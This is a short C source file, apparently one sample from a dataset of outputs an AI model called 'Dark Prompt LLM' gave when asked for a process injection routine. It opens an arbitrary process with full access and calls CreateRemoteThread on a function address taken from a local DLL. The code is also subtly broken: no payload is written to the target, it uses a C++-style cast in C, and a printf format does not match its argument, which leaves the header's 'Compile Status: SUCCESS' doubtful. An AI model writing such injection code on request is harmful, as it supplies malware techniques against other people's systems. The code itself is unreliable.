/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-26 12:00:45
 * Category: ProcessInjection
 * Prompt: Generate a process injection routine in C using CreateRemoteThread
 * Compile Status: SUCCESS
 * Sample: 1
 * ============================================================
 */
 
#include <windows.h>
#include <stdio.h>

#define MSAGENTRENDERER_DLL "msagrender.dll"
#define MSAGENTRENDERER_FUNCTION "Render"

typedef void* (WINAPI *fnRender)(void);

int main(int argc, char **argv)
{
    DWORD bRet;
    HANDLE hTargProc = 0;
    
    if(argc !=2){
        printf("USAGE: %s ProcessID\n", argv[0]);
        return -1;
    }
    
    // resolve msagrender.dll's Render function address
    HMODULE hLib = LoadLibrary(MSAGENTRENDERER_DLL);
    fnRender pFuncAddr = (fnRender)GetProcAddress(hLib, MSAGENTRENDERER_FUNCTION);
    
    // get the target process by pid
    hTargProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, atoi(argv[1]));
    if(!hTargProc){
        fprintf(stderr,"Failed to open PID %s (%d)", argv[1], GetLastError());
        return -1;
    }

    printf("Creating remote thread with address of %s at %#x.\n", MSAGENTRENDERER_FUNCTION,
           int64_t(pFuncAddr));
    // now we create a remote thread that points to this function.
    CreateRemoteThread(hTargProc, NULL, 0, (LPTHREAD_START_ROUTINE)pFuncAddr, NULL, 0, NULL);
}